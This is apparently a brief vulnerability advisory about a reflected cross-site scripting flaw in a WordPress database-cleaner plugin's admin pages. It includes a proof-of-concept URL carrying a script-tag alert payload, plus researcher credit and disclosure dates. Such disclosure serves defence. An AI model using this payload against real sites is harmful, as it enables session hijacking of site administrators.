The plugin does not escape numerous generated URLs before outputting them back in href attributes of admin dashboard pages, leading to Reflected Cross-Site Scripting
https://example.com/wp-admin/admin.php?page=advanced_db_cleaner&aDBc_tab=cron&aDBc_cat=all&"><script>alert(/XSS/)</script> Other pages are affected
ZhongFu Su(JrXnm) of WuHan University
ZhongFu Su(JrXnm) of WuHan University
Yes
2022-06-27 (about 10 months ago)
2022-06-27 (about 10 months ago)
2023-04-01 (about 1 months ago)